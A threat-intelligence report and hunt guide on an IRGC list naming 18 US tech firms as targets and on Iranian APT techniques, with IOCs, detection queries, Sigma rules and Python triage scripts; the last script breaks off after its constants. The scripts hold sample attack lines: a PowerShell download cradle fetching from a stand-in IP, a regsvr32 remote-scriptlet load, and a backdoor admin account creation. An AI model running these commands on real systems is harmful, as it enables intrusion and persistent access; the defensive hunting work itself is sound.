IRGC Names 18 US Tech Firms as Targets: A Kinetic and Cyber Threat Hits the Private Sector
Iran's Islamic Revolutionary Guard Corps has publicly named 18 companies, 17 of them major US corporations, as targets for destruction, effective 8:00 PM Tehran time on April 1, 2026 [1]. The threat isn't theoretical. In early March 2026, AWS confirmed drone strikes damaged two of its facilities in the UAE and one in Bahrain, demonstrating Iran's willingness to target commercial infrastructure. Separately, Stryker confirmed a cyberattack on March 11, 2026, causing "global network disruption" to its Microsoft environment. This is the first time a state actor has issued a public, time-stamped targeting list against named private-sector companies, combining kinetic strike threats with coordinated cyber operations.
The IRGC statement, issued March 31, warned employees of the listed companies to evacuate their workplaces and instructed civilians to move at least one kilometer away from relevant facilities [1][2]. The language was explicit: "These companies, starting from 20:00 on Wednesday, April 1 (Tehran time), should expect the destruction of their relevant units in return for each assassination in Iran" [1].
The Target List
Foreign Policy published the list of 18 companies, almost all of them US corporations [2]: Cisco, HP, Intel, Oracle, Microsoft, Apple, Google, Meta, IBM, Dell, Palantir, Nvidia, J.P. Morgan Chase, Tesla, GE, Spire Solution and Boeing, plus UAE-based G42, a major AI and cloud company [2]. The IRGC's stated rationale ties these companies to US defense and intelligence contracts and their alleged role in "assassination targets designed by American ICT and AI companies" [1].
This is not a cyber-only threat. The inclusion of Boeing, Tesla, and GE signals that the IRGC views physical manufacturing and defense assets as valid targets alongside cloud and software infrastructure.
Targeted Facilities by Location in the Middle East
Several of these companies maintain significant physical and digital infrastructure across the Gulf region. Based on known corporate presence:
United Arab Emirates (UAE)
- Amazon Web Services: Operates the Middle East (UAE) region (me-central-1); not on the IRGC list, but struck by drones in March 2026
- G42 (Abu Dhabi-based): Explicitly named on the IRGC target list [2]
- Microsoft, Google, Oracle, IBM, Dell, HP, Cisco, Palantir, Nvidia: All maintain regional headquarters, data centers, or major offices in Dubai or Abu Dhabi
- J.P. Morgan Chase: Regional banking operations in Dubai International Financial Centre
- Boeing: Maintenance and defense services operations in Abu Dhabi
- GE: Regional energy and aviation operations across the UAE
- Tesla: Showrooms and service centers in Dubai
- Spire Solution: UAE-based cybersecurity and IT firm [2]
Bahrain
- Amazon Web Services: Operates the Middle East (Bahrain) region (me-south-1), its first Gulf region; one of the March 2026 drone strikes damaged a facility here
Broader Gulf Presence (Saudi Arabia, Qatar, Kuwait)
- Microsoft, Google, Oracle, IBM: Data centers and regional offices across Riyadh, Doha, and other Gulf capitals
- Intel, HP, Dell: Sales and engineering offices throughout the GCC
- Apple, Meta: Regional operations and content moderation centers
The concentration of US tech infrastructure in the UAE and Bahrain makes these countries the most immediate physical threat surface.
Attacks Already Underway
The Stryker cyberattack on March 11, 2026, claimed by the Handala Hack group, represents a significant cyber operation. Palo Alto Networks' Unit 42 identifies Handala as directly linked to Iran's Ministry of Intelligence and Security (MOIS) [4]. The group claimed their "major cyber operation has been executed with complete success" [5].
The US Department of Justice seized four Handala-controlled domains on March 19, 2026, handala-hack.to and handala-redwanted.to among them [5]. The group had used these domains to claim credit for the destructive malware attack against Stryker and to post personally identifiable information of approximately 190 Israel Defense Forces and government individuals [5]. Handala also sent death threats to Iranian dissidents from the email account Handala_Team@outlook.com [5].
Background: Iran's Cyber Apparatus
Iranian cyber operations are split between MOIS-linked groups (like Handala) and IRGC-affiliated actors (like APT35/Charming Kitten and APT42). These groups have a documented history stretching back to 2012 [4]. CISA's October 2024 advisory detailed how Iranian actors have used brute force attacks and MFA "push bombing" against healthcare, government, IT, engineering, and energy sector organizations since at least October 2023 [7]. A separate CISA advisory noted that Iranian actors sell compromised network access on cybercriminal forums and collaborate with ransomware affiliates [8].
APT42 has been documented using typo-squatted domains like washinqtonpost.press for credential harvesting operations targeting cloud environments [10].
Phishing at Scale
Unit 42 identified 7,381 phishing URLs spanning 1,881 unique hostnames in a conflict-themed campaign [4]. These URLs target critical infrastructure sectors and exploit the current geopolitical crisis as a lure. Domains like hyperfilevault1.xyz, iranforward.org, and trumpvsirancoin.xyz were used in scam campaigns requesting humanitarian aid donations [4].
Living Off the Land
Trellix's 2026 analysis of Iranian cyber capabilities found that threat actors prioritize living-off-the-land (LOTL) techniques using native system utilities [6]. PowerShell and cmd.exe serve as the "universal backbone for execution across nearly all groups" [6]. APT35 and Parisite weaponize LOLBins including Regsvr32, Mshta, and Rundll32 to evade detection [6].
Command and Control Evolution
Iranian C2 infrastructure has shifted to incorporate Telegram-based communications and blockchain-based domain generation algorithms [6]. This makes traditional domain blocking less effective.
Credential Harvesting and Initial Access
Microsoft previously disrupted 99 phishing domains used by Iranian actors, including outlook-verify.net, yahoo-verify.net, verification-live.com, and myaccount-services.net [12]. APT42 operates three distinct clusters of credential harvesting infrastructure, using generic login pages on domains like panel-live-check.online [10]. PHOSPHORUS (Microsoft's name for APT35/Charming Kitten) targeted Fortinet FortiOS SSL VPN and Exchange Servers globally, and was observed creating local administrator accounts with the username help and password _AS_@1394 [11].
Destructive Capabilities
Iranian actors have demonstrated willingness to deploy wiper malware and ransomware for destructive impact. PHOSPHORUS used BitLocker for ransomware deployment on compromised networks [11]. APT35 (also tracked as Charming Kitten and Magic Hound) deploys custom implants including PowerLess, a PowerShell backdoor [14]; Magic Hound is an alias of the group, not a tool. Charming Kitten has exploited CVE-2012-1823 for remote code execution and deployed web shells for persistence [13].
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| Domain | handala-hack.to | MOIS-controlled domain seized by DOJ | [5] |
| Domain | handala-redwanted.to | MOIS-controlled domain for PII posting | [5] |
| Domain | justicehomeland.org | Shell hacktivist entity domain | [5] |
| Domain | karmabelow80.org | Shell hacktivist entity domain | [5] |
| Domain | hyperfilevault1.xyz | Phishing campaign scam domain | [4] |
| Domain | iranforward.org | Scam site requesting humanitarian donations | [4] |
| Domain | trumpvsirancoin.xyz | Scam domain exploiting conflict theme | [4] |
| Domain | washinqtonpost.press | APT42 typo-squatted phishing domain | [10] |
| Domain | panel-live-check.online | APT42 credential harvesting page | [10] |
| Domain | outlook-verify.net | Credential harvesting phishing domain | [12] |
| Domain | yahoo-verify.net | Credential harvesting phishing domain | [12] |
| Domain | verification-live.com | Credential harvesting phishing domain | [12] |
| Domain | myaccount-services.net | Credential harvesting phishing domain | [12] |
| Email | Handala_Team@outlook.com | Account used by Handala to send death threats to Iranian dissidents | [5] |
| Malware | PowerLess | Custom PowerShell backdoor attributed to APT35 (Charming Kitten, also tracked as Magic Hound) | [14] |
MITRE ATT&CK Techniques
| Technique ID | Name | Context |
|---|---|---|
| T1566.001 | Spearphishing Attachment | Primary initial access vector across Iranian groups [14] |
| T1566.002 | Spearphishing Link | 7,381 phishing URLs identified in campaign [4] |
| T1059.001 | PowerShell | Universal execution backbone for Iranian actors [6] |
| T1218 | System Binary Proxy Execution | Regsvr32, Mshta, Rundll32 abuse [6] |
| T1110 | Brute Force | Password spraying against critical infrastructure accounts [7] |
| T1621 | Multi-Factor Authentication Request Generation | MFA "push bombing" once a valid password is obtained [7] |
| T1078 | Valid Accounts | Compromised credentials and network access sold on criminal forums [8] |
| T1190 | Exploit Public-Facing Application | Fortinet, Exchange exploitation [11] |
| T1505.003 | Web Shell | Persistence on compromised systems [13] |
| T1486 | Data Encrypted for Impact | BitLocker ransomware deployment [11] |
| T1071 | Application Layer Protocol | Telegram-based and blockchain C2 [6] |
| T1003 | OS Credential Dumping | Post-compromise credential access [7] |
Detection and Hunting
Phishing Infrastructure: Block or alert on the domains listed in the IOC table. Hunt DNS logs for newly seen .xyz TLD domains and for names that pair a brand with a verification keyword (verify, live-check, account-services). Query: index=dns (query="*.xyz" OR query="*verify*" OR query="*live-check*") | stats count dc(src_ip) as clients earliest(_time) as first_seen by query | sort first_seen, then correlate the hits with email gateway logs. A bare .xyz match is noisy on its own; first-seen time and client count are what separate a lure from a legitimate SaaS domain.
LOTL Detection: Monitor for anomalous PowerShell execution, especially encoded commands. Watch for Regsvr32, Mshta, and Rundll32 loading payloads from unusual paths. Sysmon Event ID 1 process creation logs are critical here. Flag any regsvr32.exe /s /n /u /i:<URL> patterns.
MFA Push Bombing: Alert on accounts receiving more than 5 MFA push notifications in a 10-minute window. Correlate with failed authentication attempts from IP ranges associated with VPN or proxy services. In Entra ID (Azure AD) sign-in logs, ResultType 50074 is a sign-in interrupted because an MFA challenge was issued and 500121 is a challenge the user denied or let time out; a ResultType 0 for the same user shortly after a burst means the fatigue worked. Sentinel query: SigninLogs | where ResultType in ("50074", "500121") | summarize challenges = countif(ResultType == "50074"), denied = countif(ResultType == "500121") by UserPrincipalName, IPAddress, bin(TimeGenerated, 10m) | where challenges > 5.
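The windowed logic behind that alert, as an added example for this report (not code from any cited source), written in Python so it can run over exported sign-in records offline. It assumes Entra ID sign-in JSON with the fields userPrincipalName, ipAddress, createdDateTime and status.errorCode, the error-code meanings listed in the docstring, and constructed sample records; per user it reports the densest run of challenges, how many were denied, and whether a success followed the burst:

```python
"""Sliding-window detection of MFA push bombing over Entra ID sign-in records.

Added example for this report, not code from any cited source. Assumes records
shaped like Entra ID sign-in log entries exported as JSON: userPrincipalName,
ipAddress, createdDateTime and status.errorCode are the real field names; the
sample records below are constructed. Error-code meaning is an assumption to
confirm against your tenant:
  50074  - sign-in interrupted because an MFA challenge was issued
  500121 - the MFA challenge failed (user denied it or it timed out)
  0      - sign-in succeeded
"""
from collections import defaultdict
from datetime import datetime, timedelta

MFA_CHALLENGE = 50074
MFA_FAILED = 500121
SUCCESS = 0

WINDOW = timedelta(minutes=10)
THRESHOLD = 5  # alert when a user gets more than this many challenges in WINDOW


def sample_record(minute, upn, ip, code, second=0):
    """Build one constructed sign-in record at 02:<minute>:<second> UTC on 2026-03-31."""
    ts = datetime(2026, 3, 31, 2, minute, second)
    return {"userPrincipalName": upn, "ipAddress": ip,
            "createdDateTime": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
            "status": {"errorCode": code}}


# Constructed sample: j.doe gets six challenges in eight minutes, denies three,
# then approves one; a.smith is a normal single challenge followed by success.
SAMPLE_SIGNINS = [
    sample_record(m, "j.doe@example.com", "203.0.113.7", code)
    for m, code in enumerate([MFA_CHALLENGE, MFA_FAILED, MFA_CHALLENGE, MFA_FAILED,
                              MFA_CHALLENGE, MFA_CHALLENGE, MFA_CHALLENGE, MFA_FAILED,
                              MFA_CHALLENGE, SUCCESS])
] + [
    sample_record(0, "a.smith@example.com", "198.51.100.20", MFA_CHALLENGE),
    sample_record(0, "a.smith@example.com", "198.51.100.20", SUCCESS, second=30),
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_push_bombing(records, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per user whose densest window of MFA challenges exceeds
    the threshold. The alert also counts denials inside that window and flags a
    success that lands within `window` after the burst (the fatigue worked)."""
    by_user = defaultdict(list)
    for r in records:
        by_user[r["userPrincipalName"]].append(
            (parse_ts(r["createdDateTime"]), r["ipAddress"], r["status"]["errorCode"]))

    alerts = []
    for user, events in by_user.items():
        events.sort()
        challenges = [e for e in events if e[2] == MFA_CHALLENGE]
        best = None
        start = 0
        for end in range(len(challenges)):
            # shrink the window from the left until it spans at most `window`
            while challenges[end][0] - challenges[start][0] > window:
                start += 1
            count = end - start + 1
            if count > threshold and (best is None or count > best["challenges"]):
                w_start, w_end = challenges[start][0], challenges[end][0]
                in_window = [e for e in events if w_start <= e[0] <= w_end]
                best = {
                    "user": user,
                    "window_start": w_start.isoformat(),
                    "challenges": count,
                    "denied_or_timed_out": sum(1 for e in in_window if e[2] == MFA_FAILED),
                    "approved_after_fatigue": any(
                        e[2] == SUCCESS and w_end <= e[0] <= w_end + window for e in events),
                    "source_ips": sorted({e[1] for e in in_window}),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_push_bombing(SAMPLE_SIGNINS):
        print(alert)
```

The sliding window is keyed on challenge events only, so a user who legitimately signs in from several devices over the day does not accumulate; the denial count and the post-burst success are the two fields an analyst needs to decide between "annoyed user" and "compromised account".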
Credential Harvesting: Hunt for creation of a local account named help (Security Event ID 4720, TargetUserName) and for that account being added to Administrators (4732; local members often appear only as a SID, so join on the TargetSid from the 4720 event). The password _AS_@1394 [11] is never written to authentication logs, but it does show up in command-line auditing (Security 4688 with command line, or Sysmon Event ID 1) when the operator runs net user help _AS_@1394 /add, so hunt process command lines for it as well.
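The command-line side of the LOTL and account-creation hunts above, as an added example for this report rather than code from any cited source. It decodes -EncodedCommand payloads the way PowerShell does (base64 over UTF-16LE), then tags download cradles, regsvr32 /i:<URL> scriptlet loads, mshta fetching remote content, and the net user help _AS_@1394 /add creation. The regexes, finding names and sample command lines are assumptions for illustration; only the help / _AS_@1394 credentials come from the cited reporting [11]:

```python
"""Command-line triage for the living-off-the-land and persistence patterns this
report hunts: encoded PowerShell download cradles, regsvr32 loading a remote
scriptlet (/s /n /u /i:<URL>, the "squiblydoo" pattern), mshta fetching remote
content, and creation of the PHOSPHORUS 'help' local administrator.

Added example for this report, not code from any cited source. Input is the
CommandLine field of Sysmon Event ID 1 or Security 4688 (with command-line
auditing on); the sample lines are constructed. The help / _AS_@1394 credentials
are the ones the report cites from Microsoft [11]; the encoded payload uses the
UTF-16LE + base64 encoding powershell.exe expects for -EncodedCommand. Finding
names and regexes are assumptions for illustration.
"""
import base64
import re

PHOSPHORUS_USER = "help"
PHOSPHORUS_PASS = "_AS_@1394"

# -e, -ec, -enc and -EncodedCommand are the forms powershell.exe accepts.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|webclient|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|frombase64string", re.I)
REGSVR_REMOTE_RE = re.compile(r"regsvr32.*?/i:\s*[\"']?(?:https?|ftp)://", re.I)
MSHTA_REMOTE_RE = re.compile(r"mshta.*?(?:https?|ftp)://", re.I)
NET_USER_ADD_RE = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+(\S+)\s+/add\b", re.I)
NET_LOCALGROUP_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Return the list of finding tags for one command line (empty if clean)."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("powershell_encoded_command")
    # the cradle may be visible in the clear or only after decoding
    if CRADLE_RE.search(cmdline) or (decoded and CRADLE_RE.search(decoded)):
        findings.append("powershell_download_cradle")
    if REGSVR_REMOTE_RE.search(cmdline):
        findings.append("regsvr32_remote_scriptlet")
    if MSHTA_REMOTE_RE.search(cmdline):
        findings.append("mshta_remote_content")
    m = NET_USER_ADD_RE.search(cmdline)
    if m:
        user, password = m.group(1), m.group(2)
        if user.lower() == PHOSPHORUS_USER or password == PHOSPHORUS_PASS:
            findings.append("phosphorus_help_account")
        else:
            findings.append("local_account_created")
    m = NET_LOCALGROUP_RE.search(cmdline)
    if m and m.group(1).lower() == PHOSPHORUS_USER:
        findings.append("help_added_to_administrators")
    return findings


def triage_all(cmdlines):
    """Map each command line to its findings, dropping the clean ones."""
    results = {}
    for cmdline in cmdlines:
        findings = triage(cmdline)
        if findings:
            results[cmdline] = findings
    return results


# Constructed sample command lines (not from any real incident).
PAYLOAD_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/a.ps1')"
PAYLOAD_ENCODED = base64.b64encode(PAYLOAD_PLAINTEXT.encode("utf-16le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -enc {PAYLOAD_ENCODED}",
    "regsvr32.exe /s /n /u /i:http://198.51.100.5/p.sct scrobj.dll",
    f"net user {PHOSPHORUS_USER} {PHOSPHORUS_PASS} /add",
    f"net localgroup administrators {PHOSPHORUS_USER} /add",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    r"regsvr32.exe /s C:\Vendor\comctl.dll",
]

if __name__ == "__main__":
    for cmdline, findings in triage_all(SAMPLE_COMMAND_LINES).items():
        print(findings, "<-", cmdline[:80])
```

The two benign samples (a signed deployment script and a local DLL registration) produce no findings, which is the point of matching the full /s /n /u /i:<URL> shape and a URL scheme rather than the binary name alone; the decoded cradle is what the Splunk -enc search above cannot see.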
C2 Communications: Monitor for Telegram API calls from servers that shouldn't be using Telegram. Watch for DNS queries to blockchain-based naming systems.
Physical Security: For organizations with Gulf-region facilities, coordinate with physical security teams on the IRGC's 1km evacuation warning [1][2].
Analysis
This is the first time the IRGC has issued a public, time-bound targeting list naming specific private-sector companies. The threat of kinetic strikes combined with ongoing cyber operations represents a significant escalation. Iran is treating US tech companies as legitimate military targets, explicitly linking them to US intelligence and defense operations.
The 18-company list is notable for its breadth. It includes cloud providers (Microsoft, Google, Oracle), semiconductor firms (Intel, Nvidia), defense contractors (Boeing, Palantir), financial institutions (J.P. Morgan Chase), and even automotive (Tesla). The inclusion of Spire Solution, a relatively small UAE-based firm, alongside Fortune 50 companies suggests the targeting criteria extend beyond size to perceived involvement in regional intelligence activities.
The DOJ's March 19 seizure of Handala domains [5] shows US law enforcement is actively disrupting Iranian cyber infrastructure, but the volume of operations (7,381 phishing URLs from a single campaign [4]) suggests the disruption is insufficient to degrade overall capability.
Red Sheep Assessment
Confidence: High (based on confirmed IRGC public statement and verified Stryker cyberattack)
The sources collectively point to something the individual reports don't state explicitly: Iran has crossed a doctrinal threshold. By publicly naming companies and issuing evacuation warnings, the IRGC is applying the logic of military targeting to the private sector. This isn't cyber posturing or hacktivist noise. The AWS strikes in March 2026 demonstrate Iran's willingness to target commercial infrastructure physically.
The MOIS and IRGC appear to be running parallel campaigns. Handala (MOIS) focuses on destructive cyber operations and psychological warfare against diaspora populations [5]. The IRGC's public threat operates at the strategic level, aiming to force US companies to reconsider their Gulf-region presence. The combined effect is a two-track pressure campaign: make physical facilities dangerous to occupy, and make digital infrastructure expensive to defend.
A contrarian interpretation is that the public nature of the threat is itself the weapon. The IRGC may lack the capability to simultaneously strike 18 major corporations and is relying on the announcement to cause disruption through evacuations, market panic, and reputational damage. But the Stryker cyberattack demonstrates that even organizations not directly named on the list face real risk from MOIS-affiliated groups operating under the same strategic umbrella.
Organizations with any Middle East presence, any connection to US defense or intelligence contracts, or any role in cloud infrastructure should treat this as an active, ongoing threat.
Defender's Checklist
- ▢[ ] Block all IOC domains listed above at DNS, proxy, and firewall layers
- ▢[ ] Hunt for local admin account creation with username help and password _AS_@1394 across all Windows environments. Security Event ID 4720 (account created) carries the name in TargetUserName; the password is never logged, so look for it in command-line auditing instead (4688 with command line, or Sysmon Event ID 1: net user help _AS_@1394 /add). Example: Get-WinEvent -FilterHashtable @{LogName='Security';Id=4720} | Where-Object { ([xml]$_.ToXml()).Event.EventData.Data | Where-Object { $_.Name -eq 'TargetUserName' -and $_.'#text' -eq 'help' } }
- ▢[ ] Implement conditional access policies requiring phishing-resistant MFA (FIDO2, certificate-based) for all privileged accounts and disable SMS/push-only MFA for admin roles. Alert on push bombing patterns
- ▢[ ] Audit all Fortinet FortiOS and Microsoft Exchange instances for current patch levels. Iranian actors actively exploit these platforms [11]. Validate no unauthorized web shells exist in IIS or Apache directories
- ▢[ ] For organizations with Gulf-region facilities: activate crisis management protocols, coordinate with local authorities, and verify business continuity plans for loss of physical and cloud infrastructure in UAE and Bahrain
References
- CNN. "Day 32 of Middle East conflict: Iran threatens US tech companies, Kuwaiti oil tanker attacked." https://www.cnn.com/2026/03/31/world/live-news/iran-war-us-trump-oil
- Foreign Policy. "Iran Threatens U.S. Tech Companies After Hegseth Warns of Decisive Next Few Days." https://foreignpolicy.com/2026/03/31/iran-threat-us-tech-companies-irgc-hegseth-strait-hormuz-esfahan-oil-prices/
- CBS News. "Iran says major U.S. tech firms are targets in the Middle East, with drone and cyberattacks already underway." https://www.cbsnews.com/news/iran-war-tehran-us-tech-companies-targets-middle-east-drones-cyberattacks/
- Palo Alto Networks Unit 42. "Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran." https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/
- US Department of Justice. "Justice Department Disrupts Iranian Cyber Enabled Psychological Operations." https://www.justice.gov/opa/pr/justice-department-disrupts-iranian-cyber-enabled-psychological-operations
- Trellix. "The Iranian Cyber Capability 2026." https://www.trellix.com/blogs/research/the-iranian-cyber-capability-2026/
- CISA. "Iranian Cyber Actors' Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations." https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-290a
- CISA. "Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations." https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
- Darktrace. "APT35 Charming Kitten Discovered in a Pre-Infected Environment." https://www.darktrace.com/blog/apt35-charming-kitten-discovered-in-a-pre-infected-environment
- Google Cloud Blog. "Uncharmed: Untangling Iran's APT42 Operations." https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- Microsoft Security Blog. "Evolving trends in Iranian threat actor activity." https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/
- Infosecurity Magazine. "Microsoft Claims 'Significant' Disruption of Iranian APT Group." https://www.infosecurity-magazine.com/news/microsoft-significant-disruption-1/
- Gatewatcher. "Data breach: the operations of Charming Kitten revealed." https://www.gatewatcher.com/en/lab/data-breach-the-operations-of-charming-kitten-revealed/
- Cyber Defence. "Charming Kitten (APT35)." https://www.cyber-defence.io/blog/charming-kitten-apt35
---
Hunt Guide: IRGC/MOIS Multi-Vector Campaign Against US Tech Sector
Hypothesis: If Iranian state actors (IRGC/MOIS affiliates including Handala, APT35, APT42) are active in our environment, we expect to observe PowerShell-based LOTL techniques, MFA push bombing, phishing infrastructure connections, and specific account creation patterns in Windows Security, Sysmon, authentication logs, and DNS data.
Intelligence Summary: Iran's IRGC has publicly named 18 major US tech companies for kinetic and cyber destruction effective April 1, 2026, with attacks already underway including confirmed drone strikes on AWS facilities and a destructive Handala/MOIS cyberattack on Stryker. The campaign combines physical targeting threats with sophisticated cyber operations using PowerShell implants, credential harvesting, and destructive malware.
Confidence: High | Priority: Critical
Scope
- Networks: All corporate networks with focus on external-facing services, Exchange servers, VPN gateways, and systems with access to Gulf region infrastructure
- Timeframe: Last 90 days with emphasis on March 2026 forward due to campaign timeline
- Priority Systems: Exchange servers, Fortinet VPN appliances, domain controllers, systems with PowerShell remoting enabled, web servers (IIS/Apache), any infrastructure in UAE/Bahrain/Saudi Arabia/Qatar
MITRE ATT&CK Techniques
T1059.001 — PowerShell (Execution) [P2]
Iranian actors use PowerShell as the universal backbone for execution, deploying custom backdoors like PowerLess and encoded commands
Splunk SPL:
index=* (source="WinEventLog:Microsoft-Windows-PowerShell/Operational" OR source="WinEventLog:Security" OR source="WinEventLog:Microsoft-Windows-Sysmon/Operational") (EventCode=4104 OR EventCode=4688 OR EventCode=1) (CommandLine="* -enc *" OR CommandLine="* -ec *" OR CommandLine="* -e *" OR CommandLine="*-EncodedCommand*" OR CommandLine="*IEX*" OR CommandLine="*Invoke-Expression*" OR CommandLine="*downloadstring*" OR ScriptBlockText="*WebClient*" OR ScriptBlockText="*DownloadFile*" OR ScriptBlockText="*DownloadString*") | stats count min(_time) as first_seen by Computer, User, CommandLine, ScriptBlockText | sort first_seen
Elastic KQL:
(event.code:("4104" OR "4688" OR "1") AND (process.command_line:(*\-enc* OR *\-EncodedCommand* OR *IEX* OR *Invoke\-Expression* OR *downloadstring*) OR powershell.script_block_text:(*WebClient* OR *DownloadFile*))) AND (event.provider:("Microsoft-Windows-PowerShell" OR "Microsoft-Windows-Security-Auditing" OR "Microsoft-Windows-Sysmon"))
Sigma Rule:
title: Iranian APT PowerShell Download Cradle Patterns
id: a8f9c2e3-7b5d-4f8e-9c1a-2d3e4f5a6b7c
status: experimental
description: Detects PowerShell script blocks that fetch remote content and execute it, a pattern used by Iranian APT groups
references:
  - Internal TH Report
author: Threat Hunt Team
date: 2024/01/01
modified: 2024/01/01
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  category: ps_script
  definition: Script Block Logging must be enabled (Event ID 4104)
detection:
  selection_fetch:
    ScriptBlockText|contains:
      - 'WebClient'
      - 'DownloadFile'
      - 'DownloadString'
      - 'Net.WebRequest'
      - 'Invoke-WebRequest'
  selection_exec:
    ScriptBlockText|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'FromBase64String'
  condition: selection_fetch and selection_exec
falsepositives:
  - Legitimate admin scripts
  - Software deployment tools
level: high
Monitor for base64 encoded commands and web downloads. Baseline legitimate PowerShell usage in your environment first. Encoded-command flags (-enc, -EncodedCommand) live in the process command line rather than the script block, so hunt them with the Splunk and KQL queries above or a separate process_creation rule; the Sigma rule works on the decoded script block, which is where the download cradle becomes visible regardless of encoding.
T1136.001 — Local Account (Persistence) [P1]
PHOSPHORUS creates local administrator accounts with username 'help' and password '_AS_@1394'
Splunk SPL:
index=* source=WinEventLog:Security (EventCode=4720 OR EventCode=4722 OR EventCode=4732) (TargetUserName="help" OR SamAccountName="help" OR MemberName="help") | table _time, Computer, EventCode, TargetUserName, SubjectUserName, MemberName
Elastic KQL:
(event.code:("4720" OR "4722" OR "4732") AND (winlog.event_data.TargetUserName:"help" OR winlog.event_data.SamAccountName:"help" OR winlog.event_data.MemberName:"help"))
Sigma Rule:
title: Iranian APT Local Admin Account Creation
id: b9f8d2e1-6a3c-4e7f-8d1a-9c2b3f4e5d6a
status: experimental
description: Detects creation or enabling of the local account 'help' used by PHOSPHORUS, and its addition to the local Administrators group
references:
  - Internal TH Report
author: Threat Hunt Team
date: 2024/01/01
modified: 2024/01/01
tags:
  - attack.persistence
  - attack.t1136.001
logsource:
  product: windows
  service: security
detection:
  selection_account:
    EventID:
      - 4720
      - 4722
    TargetUserName: 'help'
  selection_group:
    EventID: 4732
    TargetUserName: 'Administrators'
    MemberName|contains: 'help'
  condition: 1 of selection_*
falsepositives:
  - Legitimate help desk account creation
level: critical
The help account name is a published PHOSPHORUS indicator [11]: treat any hit as probable compromise and triage immediately, ruling out a genuine help-desk account first. The password _AS_@1394 is never recorded in authentication logs; look for it in command-line auditing (Security 4688 with command line, Sysmon Event ID 1) as net user help _AS_@1394 /add. In 4732 a local member is often recorded only as MemberSid, so join it to the TargetSid of the 4720 event rather than relying on MemberName.
T1110.003 / T1621 — Password Spraying and MFA Request Generation (Credential Access) [P2]
Iranian actors spray passwords, then "push bomb" the accounts that accept one until a user approves the MFA prompt [7]
Splunk SPL:
index=* sourcetype=azure:aad:signin (ResultType=50074 OR ResultType=500121 OR ResultType=50076) | bucket _time span=10m | stats count(eval(ResultType=50074)) as challenges count(eval(ResultType=500121)) as denied by _time, UserPrincipalName, IPAddress | where challenges > 5 | rename UserPrincipalName as user
Elastic KQL:
azure.signinlogs.result_type:("50074" or "500121" or "50076")
KQL is a filter language with no aggregation: run this query in an Elastic Security threshold rule grouped by user.name (or the UPN field your Azure integration populates) with a threshold of 6 events in 10 minutes. In Entra sign-in logs 50074 marks a sign-in interrupted by an MFA challenge, 500121 a challenge the user denied or let expire, and 50076 an MFA interrupt caused by a new device or location; a ResultType 0 from the same source right after a burst means the user gave in. Configure alerts for more than 5 prompts in 10 minutes and review prompts outside business hours.
T1566.002 — Spearphishing Link (Initial Access) [P1]
7,381 phishing URLs identified targeting critical infrastructure with conflict-themed lures
Splunk SPL:
index=* (sourcetype=dns OR sourcetype=proxy) (query="*.xyz" OR url="*.xyz" OR query="*verify*.net" OR url="*verify*.net" OR query="*verify*.com" OR url="*verify*.com" OR query="*live-check*" OR url="*live-check*" OR query="washinqtonpost.press" OR url="washinqtonpost.press") | stats count by src_ip, user, query, url | where count > 1
Elastic KQL:
(dns.question.name:(*.xyz OR *verify*.net OR *verify*.com OR *live\-check* OR washinqtonpost.press) OR url.domain:(*.xyz OR *verify*.net OR *verify*.com OR *live\-check* OR washinqtonpost.press))
Focus on .xyz TLD and typosquatted domains. Check email gateway for these domains in message bodies.
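Beyond exact IOC matching, the typosquat hunt described here and in the Detection and Hunting section above can be scored rather than eyeballed. The following is an added example for this report, not code from any cited source: it sweeps constructed DNS log lines, matches the registrable domain against the IOC table, and otherwise flags a brand name paired with a lure word (outlook-verify style) or a label within a small edit distance of a brand (washinqtonpost style). The brand list, lure words, distance threshold, log format and the naive registrable-domain helper are assumptions:

```python
"""IOC sweep and typosquat scoring over DNS query logs.

Added example for this report, not code from any cited source. The IOC list is
the report's IOC table; the brand list, the lure-word list, the edit-distance
threshold and the sample log lines are assumptions or constructed. Assumed log
line format (constructed): "<timestamp> <client_ip> <qname> <qtype>". The
registrable-domain helper keeps the last two labels and is not Public Suffix
List aware (co.uk-style suffixes would need the real list).
"""

IOC_DOMAINS = {
    "handala-hack.to", "handala-redwanted.to", "justicehomeland.org",
    "karmabelow80.org", "hyperfilevault1.xyz", "iranforward.org",
    "trumpvsirancoin.xyz", "washinqtonpost.press", "panel-live-check.online",
    "outlook-verify.net", "yahoo-verify.net", "verification-live.com",
    "myaccount-services.net",
}
# Brands the listed lures impersonate plus targeted vendors (assumption).
BRANDS = ["microsoft", "outlook", "google", "yahoo", "washingtonpost",
          "oracle", "cisco", "nvidia", "palantir", "boeing", "apple"]
LURE_WORDS = {"verify", "verification", "login", "signin", "check", "live",
              "secure", "account", "auth", "panel"}
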